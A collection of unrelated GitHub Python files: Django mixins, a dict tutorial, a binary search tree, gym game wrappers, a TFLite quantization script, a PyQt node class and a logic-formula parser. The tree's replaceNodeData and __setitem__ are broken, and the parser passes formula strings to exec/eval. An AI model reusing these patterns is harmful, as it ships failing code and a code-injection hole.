+{"seq_id":"33581225399","text":"# pylint: disable=C0111\n\"\"\"\nMixin classes for views\n\"\"\"\nfrom django.urls import reverse\nfrom django.http import HttpResponseForbidden\n\n\nclass AdminLinksMixin:\n \"\"\"\n Adds links to the admin page for an object to the context.\n\n Meant to be used together with DetailView.\n \"\"\"\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n # pylint: disable=protected-access\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n context[\"change_url\"] = reverse(f\"admin:{app_label}_{model_name}_change\",\n args=[self.object.id])\n context[\"delete_url\"] = reverse(f\"admin:{app_label}_{model_name}_delete\",\n args=[self.object.id])\n return context\n\n\nclass ViewAddMixin:\n \"\"\"\n Adds one view to the object each time the object is dispatched\n \"\"\"\n\n def get_context_data(self, **kwargs):\n self.object.add_view()\n return super().get_context_data(**kwargs)\n\n\nclass PublishedMixin:\n \"\"\"\n Fails to load unpublished objects.\n \"\"\"\n\n def dispatch(self, request, *args, **kwargs):\n user = request.user\n # pylint: disable=protected-access\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n perm = f\"{app_label}.change_{model_name}\"\n if self.get_object().is_published or user.has_perm(perm):\n return super().dispatch(request, *args, **kwargs)\n\n return HttpResponseForbidden(\"Ikke publisert\")\n\n\ndef update_published_state(model):\n \"\"\"\n Update the object with the new date.\n :param model: The model class to update\n \"\"\"\n for m in model.objects.filter(published=False).iterator():\n if m.is_published:\n m.save()\n\n\nclass PublishedListMixin:\n \"\"\"\n Excludes unpublished objects from the queryset.\n \"\"\"\n\n def get_queryset(self):\n update_published_state(self.model)\n queryset = super().get_queryset()\n return queryset.exclude(published=False)\n","repo_name":"Nabla-NTNU/content-app","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28306493081","text":"# 和list比较,dict有以下几个特点:\n# 查找和插入的速度极快,不会随着key的增加而变慢;\n# 需要占用大量的内存,内存浪费多。\n# 而list相反:\n# 查找和插入的时间随着元素的增加而增加;\n# 占用空间小,浪费内存很少。\n# 所以,dict是用空间来换取时间的一种方法。\n\n\nd = {\"Michael\": \"95\", \"Bob\": 75, \"Tracy\": 85}\nprint(d[\"Michael\"])\n\nif \"Job\" in d:\n print(\"Job key is exists\")\nelse:\n print(\"Job key is not exists\")\n\n# 如果key不存在,返回None\nif d.get(\"Job\", -1) != -1:\n print(\"Job key is exists\")\nelse:\n print(\"Job key is not exists\")\n\n# pop对应的key\nprint(d.pop(\"Bob\"))\n\ns = set([1, 2, 3])\ns.add(4)\ns.add(4)\ns.add(5)\ns.add(3)\n\ns1 = s & set([1, 2, 8,6])\nprint(\"s items \")\nfor s_ in s:\n print(s_)\nprint(\"s1 items \")\nfor s_ in s1:\n print(s_)\n\ns_1 = set([1, 2, 3])\n# set 不可变\n# error\n# s_2 = set(1, [2, 3])\n\nfor s_ in s_1:\n print(s_)\n# for s_ in s_2:\n# print(s_)\n# dict的value 可变,key不可变\ns_3 = {\"Michael\": (1, 2, 3)}\n# error\n# s_4 = {(1, [2, 3]): \"Michael\"}\ns_4 = {\"Michael\": (1, [2, 3])}\n\nfor s_ in s_3:\n print(s_3.get(s_))\nfor s_ in s_4:\n print(s_4.get(s_))\n\ndict = {}\ndict['one'] = \"1 - 菜鸟教程\"\ndict[2] = \"2 - 菜鸟工具\"\n\ntinydict = {'name': 'runoob', 'code': 1, 'site': 'www.runoob.com'}\n\nprint(dict['one']) # 输出键为 'one' 的值\nprint(dict[2]) # 输出键为 2 的值\nprint(tinydict) # 输出完整的字典\nprint(tinydict.keys()) # 输出所有键\nprint(tinydict.values()) # 输出所有值\nprint(oct(18));\n\n# 字典是支持无限极嵌套的\n\ncities={\n '北京':{\n '朝阳':['国贸','CBD','天阶','我爱我家','链接地产'],\n '海淀':['圆明园','苏州街','中关村','北京大学'],\n '昌平':['沙河','南口','小汤山',],\n '怀柔':['桃花','梅花','大山'],\n '密云':['密云A','密云B','密云C']\n },\n '河北':{\n '石家庄':['石家庄A','石家庄B','石家庄C','石家庄D','石家庄E'],\n '张家口':['张家口A','张家口B','张家口C'],\n '承德':['承德A','承德B','承德C','承德D']\n }\n}\n\nfor i in cities['北京']:\n print(i)\n\n\nfor i in cities['北京']['海淀']:\n print(i)","repo_name":"Melo15Zhang/python","sub_path":"4-3/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74712164464","text":"#Adam Burford\n#COP4533\n#Section 3594\n\nclass BinarySearchTree:\n \"\"\"Binary Search Tree class from:\n Problem Solving with Algorithms and Data Structures using Python\n By Brad Miller and David Ranum, Luther College\n --Minor refactoring by Adam Burford\n --Also removed key from nodes, now operates only on values\"\"\"\n\n def __init__(self):\n self.root = None\n self.size = 0\n\n def length(self):\n return self.size\n\n def __len__(self):\n return self.size\n\n def put(self, value):\n if self.root:\n self._put(value, self.root)\n else:\n self.root = TreeNode(value)\n self.size = self.size + 1\n\n def _put(self, value, current_node):\n if value < current_node.value:\n if current_node.hasLeftChild():\n self._put(value, current_node.left_child)\n else:\n current_node.left_child = TreeNode(value, parent = current_node)\n else:\n if current_node.hasRightChild():\n self._put(value, current_node.right_child)\n else:\n current_node.right_child = TreeNode(value,parent=current_node)\n\n\n\n def get(self, value):\n if self.root:\n match = self._get(value, self.root)\n if match:\n return match.value\n else:\n return None\n else:\n return None\n\n def _get(self, value, current_node):\n\n if not current_node:\n return None\n elif current_node.value == value:\n return current_node\n elif value < current_node.value:\n return self._get(value, current_node.left_child)\n else:\n return self._get(value, current_node.right_child)\n\n def __getitem__(self, value):\n return self.get(value)\n\n def __setitem__(self, k, v):\n self.put(k, v)\n\n def __contains__(self, key):\n return self._get(key, self.root) != None\n\n def delete(self, value):\n if self.size > 1:\n nodeToRemove = self._get(value, self.root)\n if nodeToRemove:\n self.remove(nodeToRemove)\n self.size = self.size-1\n else:\n raise KeyError('Error, key not in tree')\n elif self.size == 1 and self.root.value == value:\n self.root = None\n self.size = self.size - 1\n else:\n raise KeyError('Error, key not in tree')\n\n def __delitem__(self,key):\n self.delete(key)\n\n def remove(self, currentNode):\n if currentNode.isLeaf():\n if currentNode == currentNode.parent.left_child:\n currentNode.parent.left_child = None\n else:\n currentNode.parent.right_child = None\n elif currentNode.hasBothChildren():\n succ = currentNode.findSuccessor()\n succ.spliceOut()\n currentNode.value = succ.value\n\n else:\n if currentNode.hasLeftChild():\n if currentNode.isLeftChild():\n currentNode.left_child.parent = currentNode.parent\n currentNode.parent.left_child = currentNode.left_child\n elif currentNode.isRightChild():\n currentNode.left_child.parent = currentNode.parent\n currentNode.parent.right_child = currentNode.left_child\n else:\n currentNode.replaceNodeData(currentNode.left_child.value,\n currentNode.left_child.left_child,\n currentNode.left_child.right_child)\n else:\n if currentNode.isLeftChild():\n currentNode.right_child.parent = currentNode.parent\n currentNode.parent.left_child = currentNode.right_child\n elif currentNode.isRightChild():\n currentNode.right_child.parent = currentNode.parent\n currentNode.parent.right_child = currentNode.right_child\n else:\n currentNode.replaceNodeData(currentNode.right_child.value,\n currentNode.right_child.left_child,\n currentNode.right_child.right_child)\n\nclass TreeNode:\n \"\"\"Binary Search Tree Node class from:\n Problem Solving with Algorithms and Data Structures using Python\n By Brad Miller and David Ranum, Luther College\n --Minor refactoring by Adam Burford\"\"\"\n\n def __init__(self, value, left = None, right = None, parent = None):\n self.value = value\n self.left_child = left\n self.right_child = right\n self.parent = parent\n\n def hasLeftChild(self):\n return self.left_child\n\n def hasRightChild(self):\n return self.right_child\n\n def isLeftChild(self):\n return self.parent and self.parent.left_child == self\n\n def isRightChild(self):\n return self.parent and self.parent.right_child == self\n\n def isRoot(self):\n return not self.parent\n\n def isLeaf(self):\n return not (self.right_child or self.left_child)\n\n def hasAnyChildren(self):\n return self.right_child or self.left_child\n\n def hasBothChildren(self):\n return self.right_child and self.left_child\n\n def spliceOut(self):\n\n if self.isLeaf():\n if self.isLeftChild():\n self.parent.left_child = None\n else:\n self.parent.right_child = None\n elif self.hasAnyChildren():\n if self.hasLeftChild():\n if self.isLeftChild():\n self.parent.left_child = self.left_child\n else:\n self.parent.right_child = self.left_child\n self.left_child.parent = self.parent\n else:\n if self.isLeftChild():\n self.parent.left_child = self.right_child\n else:\n self.parent.right_child = self.right_child\n self.right_child.parent = self.parent\n\n def findSuccessor(self):\n succ = None\n if self.hasRightChild():\n succ = self.right_child.findMin()\n else:\n if self.parent:\n if self.isLeftChild():\n succ = self.parent\n else:\n self.parent.right_child = None\n succ = self.parent.findSuccessor()\n self.parent.right_child = self\n return succ\n\n def findMin(self):\n current = self\n while current.hasLeftChild():\n current = current.left_child\n return current\n\n def replaceNodeData(self, value, lc, rc):\n self.key = key\n self.value = value\n self.left_child = lc\n self.right_child = rc\n if self.hasLeftChild():\n self.left_child.parent = self\n if self.hasRightChild():\n self.right_child.parent = self\n\n\n","repo_name":"adamburford/COP4533","sub_path":"COP4533/Assignment 3/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"6184664768","text":"\"\"\"\nTitle: Large-Scale Study of Curiosity-Driven Learning\nAuthor: Yuri Burda, Harri Edwards, Deepak Pathak, Amos Storkey, Trevor Darrell and Alexei A. Efros\nDate: 2019\nCode version: 12/8/2020\nAvailability: https://github.com/openai/large-scale-curiosity/blob/master/wrappers.py\n\"\"\"\n\nimport itertools\nimport math\nimport queue\nfrom collections import deque\n\nimport retro\nimport gym\nimport gym.spaces\nimport numpy as np\nfrom PIL import Image\n\nclass ProcessFrame(gym.ObservationWrapper):\n def __init__(self, env):\n super(ProcessFrame, self).__init__(env)\n self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1), dtype=np.uint8)\n\n def observation(self, obs):\n return ProcessFrame.process(obs)\n\n @staticmethod\n def process(frame, crop=True):\n if frame.size == 210 * 160 * 3:\n img = np.reshape(frame, [210, 160, 3]).astype(np.float32)\n elif frame.size == 250 * 160 * 3:\n img = np.reshape(frame, [250, 160, 3]).astype(np.float32)\n elif frame.size == 224 * 240 * 3: # mario resolution\n img = np.reshape(frame, [224, 240, 3]).astype(np.float32)\n else:\n assert False, \"Unknown resolution.\" + str(frame.size)\n img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 + img[:, :, 2] * 0.114\n size = (84, 110 if crop else 84)\n resized_screen = np.array(Image.fromarray(img).resize(size, resample=Image.BILINEAR), dtype=np.uint8)\n x_t = resized_screen[18:102, :] if crop else resized_screen\n x_t = np.reshape(x_t, [84, 84, 1])\n return x_t.astype(np.uint8)\n\n\nclass ImageToPyTorch(gym.ObservationWrapper):\n def __init__(self, env):\n super(ImageToPyTorch, self).__init__(env)\n old_shape = self.observation_space.shape\n self.observation_space = gym.spaces.Box(\n low=0.0,\n high=1.0,\n shape=(old_shape[-1], old_shape[0], old_shape[1]),\n dtype=np.float32)\n\n def observation(self, observation):\n return np.moveaxis(observation, 2, 0)\n\n\nclass ExtraTimeLimit(gym.Wrapper):\n def __init__(self, env, max_episode_steps=10000):\n gym.Wrapper.__init__(self, env)\n self._max_episode_steps = max_episode_steps\n self._elapsed_steps = 0\n\n def step(self, action):\n observation, reward, done, info = self.env.step(action)\n self._elapsed_steps += 1\n if self._elapsed_steps > self._max_episode_steps:\n done = True\n return observation, reward, done, info\n\n def reset(self):\n self._elapsed_steps = 0\n return self.env.reset()\n\nclass SMBMarioFitnessWrapper(gym.Wrapper):\n def __init__(self, env):\n self.max_x_distance = 0\n super(SMBMarioFitnessWrapper, self).__init__(env)\n\n def step(self, action):\n o, r, done, info = self.env.step(action)\n mario_x = info[\"player_xpos_high\"] * 256 + info[\"player_xpos_low\"]\n if mario_x < self.max_x_distance:\n r = 0\n else:\n self.max_x_distance = mario_x\n\n return o, r, done, info\n\n def reset(self):\n self.max_x_distance = 0\n return self.env.reset()\n\nclass SkipFrame(gym.Wrapper):\n def __init__(self, env, skip=4):\n self.skip = skip\n self.observation_buffer = deque(maxlen=2)\n super(SkipFrame, self).__init__(env)\n\n def step(self, action):\n \"\"\"Step with an action for skip time steps\"\"\"\n skip_reward = 0.0\n done = None\n for _ in range(self.skip):\n o, r, done, info = self.env.step(action)\n self.observation_buffer.append(o)\n skip_reward += r\n if done:\n break\n observation_frame = np.max(\n np.stack(self.observation_buffer), axis=0\n )\n return observation_frame, skip_reward, done, info\n\n def reset(self):\n \"\"\"Reset the environment and return the next frame\"\"\"\n self.observation_buffer.clear()\n o = self.env.reset()\n self.observation_buffer.append(o)\n return o\n\nclass TimeLimitWithRewardThreshold(gym.Wrapper):\n def __init__(self, env, max_episode_steps=None, reward_threshold=0.1, frame_timeout_max=40):\n gym.Wrapper.__init__(self, env)\n self.reward_threshold = reward_threshold\n self._max_episode_steps = max_episode_steps\n self._elapsed_steps = 0\n self.steps_until_done = frame_timeout_max\n self.frame_timeout_max = frame_timeout_max\n\n def step(self, action):\n observation, reward, done, info = self.env.step(action)\n self._elapsed_steps += 1\n self.steps_until_done = self.steps_until_done - 1\n\n if reward > 0:\n self.steps_until_done = self.frame_timeout_max\n\n if self.steps_until_done < 0:\n done = True\n\n return observation, reward, done, info\n\n def reset(self):\n self._elapsed_steps = 0\n self.steps_until_done = self.frame_timeout_max\n return self.env.reset()\n\nclass LimitedDiscreteActions(gym.ActionWrapper):\n KNOWN_BUTTONS = {\"A\", \"B\"}\n KNOWN_SHOULDERS = {\"L\", \"R\"}\n\n '''\n Reproduces the action space from curiosity paper.\n '''\n\n def __init__(self, env, all_buttons, whitelist=KNOWN_BUTTONS | KNOWN_SHOULDERS):\n gym.ActionWrapper.__init__(self, env)\n\n self._num_buttons = len(all_buttons)\n button_keys = {i for i in range(len(all_buttons)) if all_buttons[i] in whitelist & self.KNOWN_BUTTONS}\n buttons = [(), *zip(button_keys), *itertools.combinations(button_keys, 2)]\n shoulder_keys = {i for i in range(len(all_buttons)) if all_buttons[i] in whitelist & self.KNOWN_SHOULDERS}\n shoulders = [(), *zip(shoulder_keys), *itertools.permutations(shoulder_keys, 2)]\n arrows = [(), (4,), (5,), (6,), (7,)] # (), up, down, left, right\n acts = []\n acts += arrows\n acts += buttons[1:]\n acts += [a + b for a in arrows[-2:] for b in buttons[1:]]\n self._actions = acts\n self.action_space = gym.spaces.Discrete(len(self._actions))\n\n def action(self, a):\n mask = np.zeros(self._num_buttons)\n for i in self._actions[a]:\n mask[i] = 1\n return mask\n\ndef create_smb_nes_env(max_episode_steps=3000):\n # Create gym env\n env = retro.make('SuperMarioBros-Nes', \"Level1-1\")\n buttons = env.buttons\n env = TimeLimitWithRewardThreshold(\n SMBMarioFitnessWrapper(\n LimitedDiscreteActions(\n\n ProcessFrame(\n SkipFrame(\n env\n )\n ), buttons\n )\n ), max_episode_steps=max_episode_steps\n )\n obs = env.reset()\n return env, obs\n\n\ndef create_ppo_smb_nes_env(env):\n env = SkipFrame(env)\n env = ProcessFrame(env)\n env = ExtraTimeLimit(env)\n env = ImageToPyTorch(env)\n env = LimitedDiscreteActions(env, env.buttons)\n return env\n","repo_name":"GraysonGrzadzielewski/Capstone","sub_path":"Capstone/utils/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38194965529","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0,1,2,3\"\nimport logging\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom tqdm.auto import tqdm as tq\nimport tensorflow as tf\nfrom tensorflow.keras import mixed_precision\nimport wandb\nfrom wandb.keras import WandbCallback, WandbMetricsLogger\n\n# private\nfrom modules.model import A2IModel\nfrom modules.lr_scheduler import CustomOneCycleSchedule, LearningRateLogger\nfrom cfg import configs\nimport functions\n\nmodel = A2IModel(configs=configs)\nmodel.initialize()\nscheduler = CustomOneCycleSchedule(\n max_lr=configs.optimizer.learning_rate, \n epochs=configs.general.epochs,\n steps_per_epoch=500,\n start_lr=None, end_lr=None, warmup_fraction=configs.optimizer.warm_up_rate,\n)\noptimizer = tf.keras.optimizers.AdamW(\n learning_rate=scheduler,\n weight_decay=configs.optimizer.weight_decay,\n beta_1=configs.optimizer.beta_1,\n beta_2=configs.optimizer.beta_2,\n ema_momentum=configs.optimizer.ema_momentum,\n)\nmodel.compile(optimizer=optimizer)\nmodel.load_weights('/home/n1/sangsooim/2_AAI/project/version7/densenet_best_model_15-47.51.h5')\n\ntrain_dataset= functions.load_datasets(configs)\n\n#PTQ\ndef representative_data_gen():\n for img, label in train_dataset.batch(1).take(100):\n img = tf.reshape(img, shape=[1, 320, 320, 1])\n yield [img]\n\nconverter = tf.lite.TFLiteConverter.from_keras_model(model)\n\n# 옵션들\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_data_gen # 함수로 설정해야 한다.\n# Ensure that if any ops can't be quantized, the converter throws an error\nconverter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8] # 이 모델은 integer 연산만 할 것\n# Set the input and output tensors to uint8 (APIs added in r2.3)\nconverter.inference_input_type = tf.uint8 # or tf.int8\nconverter.inference_output_type = tf.uint8 # or tf.int8\n# 옵션 끝\n\npost_quant_tflite_model = converter.convert()\n\nwith tf.io.gfile.GFile('baseline_quant_model.tflite', 'wb') as f:\n f.write(post_quant_tflite_model)","repo_name":"Stomper10/maai-cxr","sub_path":"src/sangsoo/ptq_v7code.py","file_name":"ptq_v7code.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42812627433","text":"from models.node import Vertex\nfrom settings import RED, BLACK, SELECTED_ITEM_COLOR, WHITE\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtCore import Qt\n\n\nclass CanvasNode:\n \"\"\"Класс для вершины на холсте\"\"\"\n def __init__(self, node: Vertex, parent):\n self.parent = parent\n self.node_id = node.id\n self.node_name = node.name\n self.node_name_stipped = self.node_name.strip('\"')\n self.color = RED\n self.row, self.col = node.cell\n self.selected = False\n self.bool_colorize = True\n self.bool_draw_textbox = False\n\n def __str__(self):\n return self.node_name_stipped\n\n def setColor(self, color):\n self.color = color\n \n def change_color_condition(self):\n self.bool_colorize = not self.bool_colorize\n\n def setName(self, name: str):\n \"\"\"Установка нового имени\"\"\"\n self.node_name = name\n self.node_name_stipped = name.strip('\"')\n\n def setCell(self, row, col):\n \"\"\"Установка новых координат\"\"\"\n self.row, self.col = row, col\n\n def select(self):\n self.selected = True\n\n def unselect(self):\n self.selected = False\n \n def get_text_rect(self, font_size: int, dist: int, x: int, y: int) -> tuple[int]:\n \"\"\"Возвращает параметры прямоугольника, в котором расположено имя вершины\"\"\"\n text_width = font_size * len(self.node_name_stipped)\n new_x = x + dist // 2 - text_width // 2\n return new_x, y, text_width, dist\n\n def draw(self):\n \"\"\"Рисование вершины\"\"\"\n dist = self.parent.dist\n x, y = self.parent.getPoint(self.row, self.col)\n font_size = int(dist // 2)\n font = QFont()\n font.setPixelSize(font_size)\n self.parent.qp.setBrush(SELECTED_ITEM_COLOR if self.selected else self.color)\n self.parent.qp.setPen(BLACK)\n self.parent.qp.setFont(font)\n if self.bool_colorize:\n self.parent.qp.drawEllipse(int(x), int(y), int(dist), int(dist))\n text_rect = self.get_text_rect(font_size, int(dist), int(x), int(y))\n if self.bool_draw_textbox:\n self.parent.qp.setBrush(WHITE)\n self.parent.qp.setPen(WHITE)\n self.parent.qp.drawRect(*text_rect)\n self.parent.qp.setPen(BLACK)\n self.parent.qp.drawText(*text_rect, Qt.AlignCenter, self.node_name_stipped)\n\n","repo_name":"staffeev/AmongGraphs","sub_path":"canvas/canvas_node.py","file_name":"canvas_node.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"43083687975","text":"\r\n\r\ndef foo(x: int, base: int):\r\n \"\"\"Change numerical base of input number x to base.\r\n return string representation after the conversion.\r\n base numbers are less than 10.\r\n >>> foo(8, 3)\r\n '22'\r\n >>> foo(8, 2)\r\n '1000'\r\n >>> foo(7, 2)\r\n '111'\r\n \"\"\"\r\n res = \"\"\r\n while x > 0:\r\n res = str(x % base) + res\r\n x //= base\r\n return res\r\n\r\n","repo_name":"mirayayerdem/Github-Copilot-Amazon-Whisperer-ChatGPT","sub_path":"misc/Experiment results/ChatGPT/Dummy Function Names/code_generation/44/prompt_44.py","file_name":"prompt_44.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"}
+{"seq_id":"40188293103","text":"#####################################################################\n## Parser for sentences\n## The function parse_sentence is heavily inspired by\n## https://github.com/pyparsing/pyparsing/blob/master/examples/simpleBool.py#L16\n## It has been altered for this application.\n#####################################################################\n\nfrom pyparsing import infixNotation, opAssoc, Keyword, Word, alphanums, ParserElement\nfrom nnf import Var, Or, And # pylint: disable=unused-import\n\nclass Parser:\n \"\"\"A parser class for parsing formulas.\"\"\"\n def parse_sentence(self, sentence):\n \"\"\"Given a formula as a string, parse it and return a list of\n lists with the [] representing brackets. So x1 | (x2 & ~x3)\n returns [x1, |, [x2, &, [~, x3]]] \"\"\"\n # Create space between negations and atoms\n prep_sentence = sentence.split(\"~\")\n prep_sentence = \"~ \".join(prep_sentence)\n\n ParserElement.enablePackrat()\n\n\t\t# Define classes to be built at parse time, as each matching\n\t\t# expression type is parsed. Each class has a as_list method\n\t\t# that returns itself and its elements in list representation\n\t\t# (recursively).\n class BoolOperand:\n \"\"\"The class BoolOperand\"\"\"\n def __init__(self, t):\n self.label = t[0]\n\n def __str__(self) -> str:\n return self.label\n\n __repr__ = __str__\n\n def as_list(self):\n return self.label\n\n class BoolNot:\n \"\"\"The class for negations.\"\"\"\n def __init__(self, t):\n self.arg = t[0][1]\n\n def __str__(self) -> str:\n return \"~\" + str(self.arg)\n\n __repr__ = __str__\n\n def as_list(self):\n return [\"~\", self.arg.as_list()]\n\n class BoolBinOp:\n \"\"\"The parent class for binary operations.\"\"\"\n repr_symbol: str = \"\"\n\n def __init__(self, t):\n self.args = t[0][0::2]\n\n def __str__(self) -> str:\n sep = \" %s \" % self.repr_symbol\n return \"(\" + sep.join(map(str, self.args)) + \")\"\n\n\n class BoolAnd(BoolBinOp):\n \"\"\"The class for conjunctions.\"\"\"\n repr_symbol = \"&\"\n def as_list(self):\n \"\"\"Returns list of conjuncts with '&' symbol.\"\"\"\n result = []\n for argument in self.args:\n result.append(argument.as_list())\n result.append(\"&\")\n result = result[:-1]\n return result\n\n class BoolOr(BoolBinOp):\n \"\"\"The class disjunctions.\"\"\"\n repr_symbol = \"|\"\n def as_list(self):\n \"\"\"Return list of disjuncts with '|' symbol.\"\"\"\n result = []\n for argument in self.args:\n result.append(argument.as_list())\n result.append(\"|\")\n result = result[:-1]\n return result\n\n class BoolImplies(BoolBinOp):\n \"\"\"The class for implications.\"\"\"\n repr_symbol = \"->\"\n def as_list(self):\n \"\"\"Return implications in list form with '->' symbol.\"\"\"\n return [self.args[0].as_list(), \"->\", self.args[1].as_list()]\n\n # Define what the operator symbols mean\n NOT = Keyword(\"~\")\n AND = Keyword(\"&\")\n OR = Keyword(\"|\")\n IMPLIES = Keyword(\"->\")\n\n # Atoms can be alphanumerals\n bool_operand = Word(alphanums)\n bool_operand.setParseAction(BoolOperand).setName(\"bool_operand\")\n\n bool_expr = infixNotation(\n bool_operand,\n [\n # Define precedence of operations\n (NOT, 1, opAssoc.RIGHT, BoolNot),\n (OR, 2, opAssoc.LEFT, BoolOr),\n (AND, 2, opAssoc.LEFT, BoolAnd),\n (IMPLIES, 2, opAssoc.LEFT, BoolImplies)\n ],\n )\n\n # Create a parse object\n parsed_sentence = bool_expr.parseString(prep_sentence)[0]\n\n # Return the parsed sentence as a list\n return parsed_sentence.as_list()\n\n def to_nnf(self, sentence):\n \"\"\"Given a formula as a string, returns a string of the\n formula converted to NNF.\"\"\"\n # Parse the sentence and then convert it to NNF\n parsed = self.parse_sentence(sentence)\n nnf = self.to_nnf_parsed(parsed)\n\n return nnf\n\n def to_nnf_parsed(self, sentence):\n \"\"\"Helper function for the recursive proces of the to_nnf function.\n Given a formula, returns the formula partially converted\n to NNF. \"\"\"\n # If the sentence is just a string, leave it be\n if isinstance(sentence, str):\n return sentence\n # If it is negated, push the negation through\n if sentence[0] == '~':\n if isinstance(sentence[1], str):\n return \"\".join(sentence)\n if sentence[1][1] == '&':\n return self.neg_and(sentence[1])\n if sentence[1][1] == '|':\n return self.neg_or(sentence[1])\n if sentence[1][1] == '->':\n return self.neg_implies(sentence[1])\n # Remove double negations\n if sentence[1][0] == '~':\n return self.to_nnf_parsed(sentence[1][1])\n raise Exception(\"There seems to be something wrong..\")\n # If it is not negated, rewrite implication and\n # search for more negations\n operator = sentence[1]\n if operator == '->':\n left = self.to_nnf_parsed(['~', sentence[0]])\n right = self.to_nnf_parsed(sentence[2])\n return \" \".join(['(', left, '|', right, ')'])\n result = ['(']\n for i, value in enumerate(sentence):\n if i % 2 == 0:\n element = self.to_nnf_parsed(value)\n result.append(element)\n result.append(operator)\n result = result[:-1]\n result.append(')')\n return \" \".join(result)\n\n def neg_and(self, sentence):\n \"\"\"Helper function for to_nnf_parsed. Given a negated conjunction,\n returns a disjunction with the disjuncts negated. \"\"\"\n result = ['(']\n for i, value in enumerate(sentence):\n if i % 2 == 0:\n element = self.to_nnf_parsed(['~', value])\n result.append(element)\n result.append('|')\n result = result[:-1]\n result.append(')')\n return \" \".join(result)\n\n def neg_or(self, sentence):\n \"\"\"Helper function for to_nnf_parsed. Given a negated disjunction,\n returns a conjuncts with the conjuncts negated. \"\"\"\n result = ['(']\n for i, value in enumerate(sentence):\n if i % 2 == 0:\n element = self.to_nnf_parsed(['~', value])\n result.append(element)\n result.append('&')\n result = result[:-1]\n result.append(')')\n return \" \".join(result)\n\n def neg_implies(self, sentence):\n \"\"\"Helper function for to_nnf_parsed. Given a negated implication,\n returns a disjunction with the antecedent negated.\"\"\"\n # Negate the antecedent\n antecedent = self.to_nnf_parsed(['~', sentence[0]])\n consequent = self.to_nnf_parsed(sentence[2])\n\n # Return the negated implication as a conjunction\n return \" \".join(['(', antecedent, '|', consequent, ')'])\n\n def to_cnf(self, sentence, variables):\n \"\"\"\n Translate a sentence from NNF (as produced by the to_nnf function), to CNF.\n The function needs a formula/sentence as a string and a list of all\n variables occuring in the sentence. It returns the CNF formula and\n an updated list of all occurring variables.\n \"\"\"\n my_string = sentence\n all_variables = set()\n\n # Use a prefix to prevent variable name collisions\n # Add this prefix to all variables in the string\n var_prefix = \"_\"\n my_string_preprocessed = my_string\n for var in variables:\n my_string_preprocessed = my_string_preprocessed.replace(var, var_prefix + var)\n\n # Declare variables (with prefix) and parse the formula with the\n # variable prefixes added\n for var in variables:\n exec(f\"{var_prefix}{var} = Var('{var}')\")\n all_variables.add(var)\n formula = eval(my_string_preprocessed)\n\n # Translate the formula to CNF and update what variables\n # occur in the formula.\n formula = formula.to_CNF()\n for var in formula.vars():\n if not isinstance(var, str):\n all_variables.add('a' + str(var)[:4])\n else:\n all_variables.add(var)\n\n # Translate formula to string.\n list_of_conjuncts = []\n for conjunct in formula:\n conj = \"( \"\n disjunct_counter = 0\n for disjunct in conjunct:\n if str(disjunct)[-1] == '>':\n disjunct = \"a\".join(str(disjunct)[:-1].split('<'))\n if disjunct_counter < len(conjunct) - 1:\n conj = conj + str(disjunct) + \" | \"\n else:\n conj = conj + str(disjunct) + \" )\"\n disjunct_counter += 1\n list_of_conjuncts.append(conj)\n if len(formula) == 1:\n return [list_of_conjuncts[0], all_variables]\n formula_str = \"( \"\n for i, value in enumerate(list_of_conjuncts):\n if i < len(list_of_conjuncts) - 1:\n formula_str = formula_str + value + \" & \"\n else:\n formula_str = formula_str + value + \" )\"\n return [formula_str, all_variables]\n\n def translate_agenda(self, agenda):\n \"\"\"Given a (sub)-agenda returns a list of constraints. For each issue a\n constraint is added of the form (label -> formula) and (formula -> label).\n Both are made sure to be NNF formulas. \"\"\"\n new_constraints = []\n for label in agenda.keys():\n label_var = f'l{label}'\n formula = agenda[label]\n\n # Add label -> formula\n new_constraints.append(f'~{label_var} | {formula}')\n\n # Add formula -> label\n neg_formula = self.to_nnf(f'~ ({formula})')\n new_constraints.append(f'{neg_formula} | {label_var}')\n\n return new_constraints\n","repo_name":"rdehaan/jaggpy","sub_path":"src/jaggpy/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":10426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
